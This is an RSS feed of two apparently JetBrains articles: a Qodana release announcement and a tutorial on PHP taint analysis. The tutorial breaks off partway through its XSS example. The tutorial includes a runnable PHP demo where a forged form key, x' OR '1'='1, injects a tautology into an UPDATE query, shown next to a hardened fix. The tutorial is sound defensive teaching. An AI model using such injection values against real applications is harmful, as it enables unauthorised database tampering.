<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Valerie Kuzmina</title>
    <description>The latest articles on Forem by Valerie Kuzmina (@valeriekukuss).</description>
    <link>https://forem.com/valeriekukuss</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F986720%2F81dc07aa-be66-48d2-9a57-4be1c77e5f3f.jpg</url>
      <title>Forem: Valerie Kuzmina</title>
      <link>https://forem.com/valeriekukuss</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/valeriekukuss"/>
    <language>en</language>
    <item>
      <title>Qodana Is Out Of Preview With First-Class JetBrains IDE Integration</title>
      <dc:creator>Valerie Kuzmina</dc:creator>
      <pubDate>Fri, 21 Jul 2023 08:33:58 +0000</pubDate>
      <link>https://forem.com/qodana/qodana-is-out-of-preview-with-first-class-jetbrains-ide-integration-1fn3</link>
      <guid>https://forem.com/qodana/qodana-is-out-of-preview-with-first-class-jetbrains-ide-integration-1fn3</guid>
      <description>&lt;p&gt;JetBrains has always strived to deliver tools that make developers’ work enjoyable, creative, and thought-provoking. JetBrains IDEs are designed to understand code and provide valuable suggestions for improving it. Having these tips available in the editor is incredibly helpful. But modern CI-centric workflows require a reliable quality gate in your build pipeline. With that in mind, we created Qodana. &lt;/p&gt;

&lt;p&gt;Qodana is the only code quality platform on the market that uses inspections native to JetBrains IDEs and expands the smartness of your JetBrains IDE to the CI server. &lt;/p&gt;

&lt;p&gt;We built this powerful static analysis engine to enable development teams to automate code reviews, build quality gates, and enforce code quality guidelines enterprise-wide – all within their JetBrains ecosystem. The platform can be integrated into any CI/CD pipeline and can analyze code written in 60+ languages, including Java, JavaScript, TypeScript, PHP, Kotlin, Python, Go, and C#.&lt;/p&gt;

&lt;p&gt;Today, Qodana announces a huge milestone: It’s no longer in preview and is available commercially with some major improvements. Get in now to enjoy a 50% discount on your first year.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.jetbrains.com/qodana/" rel="noopener noreferrer"&gt;Try Qodana for free&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What’s new in Qodana 2023.2
&lt;/h2&gt;

&lt;p&gt;Many of you have been wondering where the name “Qodana” came from. Let us explain.&lt;/p&gt;

&lt;p&gt;“Qodana” stands for “code analyzer”.&lt;/p&gt;

&lt;p&gt;Back in 2021, after weeks of fruitless brainstorming on the product’s name, we turned to one of our polyglot colleagues for guidance. Ten minutes later, she suggested “Qodana” and right away we knew that was it.&lt;/p&gt;

&lt;p&gt;Since launching Qodana in EAP in 2021, we’ve been overjoyed by the response. To date, Qodana analyzes commits to over 9K unique projects on a monthly basis – 80% of these projects are commercial.&lt;/p&gt;

&lt;p&gt;Our early adopters have taught us a lot about what they need, and we’ve used that knowledge to make some major improvements to the static code analysis engine of Qodana. &lt;/p&gt;

&lt;h2&gt;
  
  
  1. Server-side analysis by Qodana is now fully integrated with JetBrains IDEs 2023.2
&lt;/h2&gt;

&lt;p&gt;Static analysis tools are known to be complicated to configure. With the Qodana 2023.2 release, we’ve eliminated this pain by fully integrating our code quality platform with almost all JetBrains IDEs: IntelliJ IDEA, WebStorm, PhpStorm, PyCharm, Rider, and GoLand. Please note that this functionality won’t be available until the release of the 2023.2 versions of our IDEs. &lt;/p&gt;

&lt;p&gt;This integration will bring two important benefits. &lt;/p&gt;

&lt;p&gt;The first benefit is the ease of configuration. You can try the local analysis with just a few clicks, view the list of problems across your entire project, and then configure Qodana in your preferred CI/CD system to establish the quality gate and run server-side checks. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5ads7alix9jen3u8qwcx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5ads7alix9jen3u8qwcx.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The second benefit is an improved code quality workflow. Once Qodana is configured in the continuous integration server, you’ll be able to see the results of the server-side analysis without leaving the IDE – right out of the box. Alternatively, you can navigate directly to Qodana Cloud to see the issue overview in a straightforward sunburst diagram.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Code coverage support
&lt;/h2&gt;

&lt;p&gt;Qodana now supports processing code coverage for Java, Kotlin, PHP, JavaScript, and TypeScript. When your automated tests run, Qodana reads the coverage reports produced by common unit testing frameworks and shows how much of the code the tests executed. This lets users 1) review the degree of code coverage, 2) spot parts of the code that need more testing, and 3) assess the quality of the tests themselves.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz9wtvzzaqetsxmx9hw5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz9wtvzzaqetsxmx9hw5l.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Vulnerability checker based on the Checkmarx data
&lt;/h2&gt;

&lt;p&gt;Qodana now bundles a vulnerability checker, powered by IntelliJ IDEA. This inspection spots external packages used in the project that have known vulnerabilities. The vulnerability data is provided by the software security company Checkmarx.&lt;/p&gt;

&lt;p&gt;The vulnerability checker goes beyond flagging the problem: it also offers remediation guidance, so developers can act immediately by upgrading to a stable version of the package that has no known vulnerabilities. &lt;/p&gt;

&lt;h2&gt;
  
  
  4. Quick-fixes (experimental)
&lt;/h2&gt;

&lt;p&gt;All Qodana linters (except for .NET) will provide users with the power of quick-fixes to boost their coding efficiency. Qodana is now able to apply quick-fixes to issues that can be resolved automatically and create a new pull request with the applied changes (currently available only for GitHub Actions). Then, the user will be able to review these changes before committing. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu0ljngzyhk8i7yf0oyr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu0ljngzyhk8i7yf0oyr.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the complete list of changes, refer to &lt;a href="https://www.jetbrains.com/help/qodana/new-in-2023-2.html" rel="noopener noreferrer"&gt;What’s new in Qodana 2023.2&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Qodana features beyond the 2023.2 release
&lt;/h2&gt;

&lt;p&gt;In case you haven’t tried Qodana yet, here’s a brief overview of features that are currently available in the product – beyond the newly released ones. &lt;/p&gt;

&lt;h2&gt;
  
  
  2500+ code inspections – exclusive Qodana inspections included
&lt;/h2&gt;

&lt;p&gt;Qodana can spot performance issues, unused declarations, vulnerable dependencies, potential security issues, confusing code constructs, naming and style conventions, and much more.&lt;/p&gt;

&lt;h2&gt;
  
  
  Interactive inspection reports and dashboards
&lt;/h2&gt;

&lt;p&gt;Discover issues and trends in your code and better understand the quality of your project with our fancy sunburst diagram. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57019ik6rs49m3f5ooxr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57019ik6rs49m3f5ooxr.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cloud-based overview of reports
&lt;/h2&gt;

&lt;p&gt;You can accumulate all of your Qodana reports in a single place – Qodana Cloud – and explore project trends with interactive dashboards.&lt;/p&gt;

&lt;h2&gt;
  
  
  The baseline for getting your technical debt under control
&lt;/h2&gt;

&lt;p&gt;A snapshot of the codebase, or baseline, is taken during specific Qodana runs. You can compare your current code with its baseline state and see new, unchanged, and resolved problems. &lt;/p&gt;

&lt;p&gt;For example, you can use the baseline to put less critical issues on the back burner and focus on fixing bugs that are either new or highly critical.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7486gsczsgem0ur7ez9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7486gsczsgem0ur7ez9.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Third-party license audit
&lt;/h2&gt;

&lt;p&gt;Scan dependencies in your code repository to find their licenses and see if they’re compatible with your project license.&lt;/p&gt;

&lt;h2&gt;
  
  
  Inspection constructor
&lt;/h2&gt;

&lt;p&gt;Looking to scan for a specific problem that Qodana doesn’t cover yet? You can integrate it with third-party inspection tools or create your own plugins.&lt;/p&gt;

&lt;p&gt;A video is worth a thousand words, so please feel free to check out the &lt;a href="https://youtu.be/WrhnUnzMUCg" rel="noopener noreferrer"&gt;Qodana overview video&lt;/a&gt; by our Developer Advocate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Qodana pricing that makes managers say “Wow”
&lt;/h2&gt;

&lt;p&gt;What decision-makers especially like about Qodana is that we charge per active contributor, regardless of the number of lines in the project. This makes Qodana an especially cost-efficient offer. &lt;/p&gt;

&lt;p&gt;Qodana is available in three plans, including a free plan with limited language support, and paid plans starting from $6 per active contributor per month. Paid plans require a minimum of 3 active contributors. &lt;/p&gt;

&lt;p&gt;The most advanced Qodana plan, which offers more security inspections and the license audit, comes with a one-year 50% discount! &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhmzeb1677vqdubruqqjt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhmzeb1677vqdubruqqjt.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How to get started with Qodana?
&lt;/h2&gt;

&lt;p&gt;Simply head to our &lt;a href="https://www.jetbrains.com/qodana/" rel="noopener noreferrer"&gt;website&lt;/a&gt; and claim your free trial! You’ll be asked to create an account in Qodana Cloud and connect the specified linter to your project and preferred CI/CD system. It’s that easy!&lt;/p&gt;

&lt;p&gt;Our mission is to help developers deliver code they can be proud of. We hope you enjoy Qodana and all the intelligence it packs into a straightforward sunburst diagram. If you have any questions, feel free to submit a ticket to the &lt;a href="https://youtrack.jetbrains.com/issues?q=%23QD" rel="noopener noreferrer"&gt;issue tracker&lt;/a&gt; or leave a comment below.&lt;/p&gt;

</description>
      <category>programming</category>
      <category>coding</category>
      <category>codequality</category>
      <category>cicd</category>
    </item>
    <item>
      <title>Secure Your PHP Code With Taint Analysis by Qodana</title>
      <dc:creator>Valerie Kuzmina</dc:creator>
      <pubDate>Fri, 10 Mar 2023 14:16:23 +0000</pubDate>
      <link>https://forem.com/qodana/secure-your-php-code-with-taint-analysis-by-qodana-1mj8</link>
      <guid>https://forem.com/qodana/secure-your-php-code-with-taint-analysis-by-qodana-1mj8</guid>
<description>&lt;p&gt;It only takes one user to exploit a vulnerability in your project and breach your system. To defend programs against malicious input from external users (data that static analysis marks as “tainted”), development teams add taint checking to their static analysis routines. &lt;/p&gt;

&lt;p&gt;In this year’s first release, the &lt;a href="https://www.jetbrains.com/qodana/"&gt;Qodana&lt;/a&gt; team has delivered taint analysis for PHP in the EAP. The feature is available only in Qodana for PHP 2023.1 (jetbrains/qodana-php:2023.1-eap). Qodana for PHP was the first linter we released, so we decided to let PHP developers be the first to test our new security functionality, too. We plan on adding more languages in the future, after we’ve collected enough feedback.&lt;/p&gt;

&lt;p&gt;Read on to learn more about what taint analysis is and how it works in Qodana. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9I62NLIH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/clwaxqlnq3rcml4ydr0r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9I62NLIH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/clwaxqlnq3rcml4ydr0r.png" alt="Image description" width="880" height="413"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.jetbrains.com/qodana"&gt;GET STARTED WITH QODANA&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What is taint analysis?
&lt;/h2&gt;

&lt;p&gt;A taint is any value that an external user can control and that poses a security risk if it reaches a sensitive operation unchecked. If unverified external data can flow through your program, an attacker can craft that data to cause SQL injection, arithmetic overflow, cross-site scripting, path traversal, and more. Such vulnerabilities are typically exploited to take the system down, steal credentials and other data, or change the system’s behavior.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zFYxtItn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gg88k8j31t85sz7igi3w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zFYxtItn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gg88k8j31t85sz7igi3w.png" alt="Image description" width="880" height="339"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Example of a taint. Arbitrary data from a GET parameter is written straight into the page. A malicious user can exploit this to inject markup or script into the page served to other users (cross-site scripting).  &lt;/p&gt;

&lt;p&gt;As an extra layer of defense against malicious inputs, development teams execute taint analysis when they run a security audit on the program’s attack surface. &lt;/p&gt;

&lt;p&gt;Taint analysis is the process of tracking the flow of untrusted input through the program: within a function or method body and across the calls it makes. Its core goal is to determine whether unanticipated input can affect program execution in malicious ways. &lt;/p&gt;

&lt;p&gt;Taint sources are locations where a program receives potentially tainted data, such as request parameters or the contents of a file. Sensitive operations that must not receive tainted data, such as a database query, a shell command, or HTML output, are called taint sinks. Data propagates from sources to sinks via assignments, string concatenation, and function calls.&lt;/p&gt;

&lt;p&gt;If you run taint analysis manually, you should spot all of the places where you accept data from external users and follow each piece of data through the system – the tainted data can be used in dozens of nodes. Then, to prevent taint propagation, you should take one of the two approaches described below:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sanitize the data&lt;/strong&gt;, i.e. transform the data into a safe state. In the example below, we removed HTML tags to resolve the taint. Note that stripping tags is only a partial measure for data written to a page; encoding the value for the context it is written into (for example, HTML-escaping it) is the more robust fix. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Xw_xWDHr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r9qmighs2wsuae25wwtm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Xw_xWDHr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r9qmighs2wsuae25wwtm.png" alt="Image description" width="880" height="137"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Validate the data&lt;/strong&gt;, i.e. check that the incoming data conforms to a required pattern and reject it otherwise. In the example below, we validate the &lt;code&gt;$email&lt;/code&gt; variable. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ilQhMOz3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2gdmzu7kqtfctnhqbad3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ilQhMOz3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2gdmzu7kqtfctnhqbad3.png" alt="Image description" width="880" height="201"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In other words, the taint analysis inspection traces user-tainted data from its source to your sinks, and raises the alarm when you work with that data without sanitizing or validating it. &lt;/p&gt;

&lt;h2&gt;
  
  
  How taint analysis works in Qodana
&lt;/h2&gt;

&lt;p&gt;Taint analysis is performed by Qodana for PHP starting from version 2023.1 EAP. This functionality includes an inspection that scans the code and highlights the taint and potential vulnerability, the ability to open the problem in PhpStorm to address it on the spot, and a dataflow graph visualizing the taint flow. &lt;/p&gt;

&lt;h2&gt;
  
  
  Example #1. SQL injection
&lt;/h2&gt;

&lt;p&gt;Let’s take a look at an example of SQL injection and how Qodana detects it:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gEYov37G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rbcggyhe1jyvgeulkgpd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gEYov37G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rbcggyhe1jyvgeulkgpd.png" alt="Image description" width="880" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here, Qodana shows us the following taints in the system_admin() function:&lt;/p&gt;

&lt;p&gt;Markers 1-2: Data from user form input is retrieved from the $_POST global array with no sanitization or validation and is assigned to the variable $edit. This is a taint.&lt;/p&gt;

&lt;p&gt;Marker 3: The tainted variable $edit is passed to the system_save_settings function as an argument without any proper sanitization.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9DwtBJKq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/17dnyolv25xtwdbsv80t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9DwtBJKq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/17dnyolv25xtwdbsv80t.png" alt="Image description" width="880" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Marker 4: The tainted value arrives in the $edit parameter of system_save_settings.&lt;/p&gt;

&lt;p&gt;Marker 5: The $edit array is iterated with foreach, producing the $filename key and the $status value. Both carry tainted data from $edit.&lt;/p&gt;

&lt;p&gt;Marker 6: The $filename key contains the tainted data from the $edit variable.&lt;/p&gt;

&lt;p&gt;Marker 7: The $filename key is concatenated into the SQL string, so the SQL string is now tainted.&lt;/p&gt;

&lt;p&gt;Marker 8: The tainted SQL string is passed as an argument to &lt;code&gt;db_query&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Let’s now look at the db_query:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--oQEh80nb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4qlrofkpext33wvlwr2n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--oQEh80nb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4qlrofkpext33wvlwr2n.png" alt="Image description" width="880" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Marker 9: The tainted string will be located in the $query parameter.&lt;/p&gt;

&lt;p&gt;Marker 10: This parameter is going to be an argument of the _db_query function.&lt;/p&gt;

&lt;p&gt;Let’s move on to the _db_query function:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--AkcIjbY0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f84czipidydows32uiko.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--AkcIjbY0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f84czipidydows32uiko.png" alt="Image description" width="880" height="374"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Marker 11: The tainted data is in the first parameter, $query, of the _db_query function.&lt;/p&gt;

&lt;p&gt;Marker 12: The parameter is passed to the mysql_query function, which is a sink. (mysql_query belongs to the legacy mysql extension that was removed in PHP 7.0, but the same applies to any query API that executes a string built from user data; the remedy is a prepared statement with bound parameters.)&lt;/p&gt;

&lt;p&gt;The whole data flow above illustrates how data moves from &lt;code&gt;$_POST['edit']&lt;/code&gt; to &lt;code&gt;mysql_query($query)&lt;/code&gt; without any sanitization or validation. This allows an attacker to manipulate the SQL query, which was concatenated with a key of &lt;code&gt;$_POST['edit']&lt;/code&gt;, and trigger SQL injection. &lt;/p&gt;

&lt;p&gt;Qodana will spot these risks in your codebase along with all nodes where tainted data is used, so you can sanitize all tainted data in a timely manner. &lt;/p&gt;
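&lt;p&gt;The flow above is shown only in screenshots, so here is the same source-to-sink path written out as an added example, beside its hardened counterpart. This is not the analyzed project’s code: the names system_save_settings and db_query are reused from the markers above, but the table, the in-memory SQLite backing store, and the allow-list pattern for module names are assumptions made for the example. The forged form field name closes the quoted literal in the concatenated WHERE clause, so the first version updates every row; the second version never builds SQL from the data at all.&lt;/p&gt;

```php
&lt;?php
declare(strict_types=1);

// Added example, not the analyzed project's code. The function names mirror the flow
// traced above (system_save_settings -&gt; db_query -&gt; database driver); their bodies are
// assumptions: a minimal reconstruction of the same source-to-sink path, on SQLite.

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db-&gt;exec('CREATE TABLE system (filename TEXT PRIMARY KEY, status INTEGER NOT NULL)');
    $db-&gt;exec("INSERT INTO system VALUES ('node.module', 1), ('admin.module', 1), ('blog.module', 1)");
    return $db;
}

/** Sink: runs whatever SQL text it is handed (stands in for db_query -&gt; _db_query -&gt; mysql_query). */
function db_query(PDO $db, string $query): int
{
    return (int) $db-&gt;exec($query);
}

/** Vulnerable: the keys of $edit (form field names under $_POST['edit']) are concatenated into SQL. */
function system_save_settings_vulnerable(PDO $db, array $edit): int
{
    $affected = 0;
    foreach ($edit as $filename =&gt; $status) {
        $query = "UPDATE system SET status = " . (int) $status
               . " WHERE filename = '" . $filename . "'";   // tainted key lands in the query text
        $affected += db_query($db, $query);
    }
    return $affected;
}

/** Hardened: validate every key against an allow-list pattern, then bind values in a prepared statement. */
function system_save_settings_safe(PDO $db, array $edit): int
{
    foreach (array_keys($edit) as $filename) {
        if (!is_string($filename) || preg_match('/\A[a-z0-9_]+\.module\z/', $filename) !== 1) {
            throw new InvalidArgumentException('Rejected module name: ' . var_export($filename, true));
        }
    }
    $stmt = $db-&gt;prepare('UPDATE system SET status = :status WHERE filename = :filename');
    $affected = 0;
    foreach ($edit as $filename =&gt; $status) {
        $stmt-&gt;execute([':status' =&gt; (int) $status, ':filename' =&gt; $filename]);   // no SQL is built from data
        $affected += $stmt-&gt;rowCount();
    }
    return $affected;
}

// Constructed request body: one genuine field plus a forged field name that closes the quoted
// literal and appends a tautology, so the UPDATE matches every row.
$edit = [
    'blog.module'  =&gt; 0,
    "x' OR '1'='1" =&gt; 0,
];

$rows = system_save_settings_vulnerable(makeDb(), $edit);
printf("vulnerable: %d rows updated (every module disabled)\n", $rows);

try {
    system_save_settings_safe(makeDb(), $edit);
} catch (InvalidArgumentException $e) {
    printf("hardened: %s\n", $e-&gt;getMessage());
}

// With the forged key removed, the hardened version updates exactly one row.
$rows = system_save_settings_safe(makeDb(), ['blog.module' =&gt; 0]);
printf("hardened: %d row updated\n", $rows);
```

&lt;p&gt;Run it with &lt;code&gt;php sqli_example.php&lt;/code&gt; (requires the pdo_sqlite extension). The key check is kept even though the statement is prepared, because a bound parameter can only stand for a value: if the tainted key ever selects a table or column name instead, it cannot be bound and the allow-list is the only defense.&lt;/p&gt;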

&lt;h2&gt;
  
  
  Example #2. XSS problem
&lt;/h2&gt;

&lt;p&gt;In the Qodana UI, you can see a graph that visualizes the entire taint flow. Here’s how Qodana visualizes an XSS vulnerability with two sources, whose flows merge at marker 5.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uMRBB9XS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x2f95eh48iol52hymx1v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uMRBB9XS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x2f95eh48iol52hymx1v.png" alt="Image description" width="880" height="504"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--W5d1k1AB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1t5bg2a5zci2yefzixwr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--W5d1k1AB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1t5bg2a5zci2yefzixwr.png" alt="Image description" width="880" height="537"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source 1&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Markers 1-2: Data from the searchUpdate.pos file will be read and tainted data will be assigned to the $start variable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source 2&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Markers 3-4: Data from files whose path is located in $posFile will be read and tainted data will be assigned to the $start variable.&lt;/p&gt;

&lt;p&gt;Marker 5: A merged tainted state from all conditional branches in the $start variable will be passed as an argument to the doUpdateSearchIndex method.&lt;/p&gt;

&lt;p&gt;Let’s look inside the doUpdateSearchIndex() method:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NJrLqazA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/592t4vvyrz3gijzk4xu9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NJrLqazA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/592t4vvyrz3gijzk4xu9.png" alt="Image description" width="880" height="393"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Markers 6-8: The $start parameter contains tainted data on this dataflow slice and is then passed, inside a concatenated string, as an argument to the &lt;code&gt;output&lt;/code&gt; method.&lt;/p&gt;

&lt;p&gt;Let’s look inside the output method:&lt;/p&gt;

